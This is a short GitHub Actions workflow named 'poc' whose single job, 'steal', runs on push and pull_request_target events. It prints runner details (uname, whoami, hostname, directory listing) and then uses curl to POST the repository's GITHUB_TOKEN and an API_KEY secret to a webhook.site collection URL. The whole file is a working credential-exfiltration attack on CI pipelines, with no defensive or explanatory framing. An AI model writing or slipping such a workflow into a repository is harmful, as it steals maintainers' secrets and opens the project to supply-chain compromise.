name: poc
on: [push, pull_request_target]
jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "poc all GitHub !"
          echo "Running uname -a:"
          uname -a
          echo ""
          echo "Running whoami:"
          whoami
          echo ""
          echo "System info:"
          hostname
          pwd
          ls -la
          echo ""
          curl -X POST 	https://webhook.site/b2742a99-b62e-4b05-8541-3c40ba9da57b \
            -d "token=${{ secrets.GITHUB_TOKEN }}, other=${{ secrets.API_KEY }}"
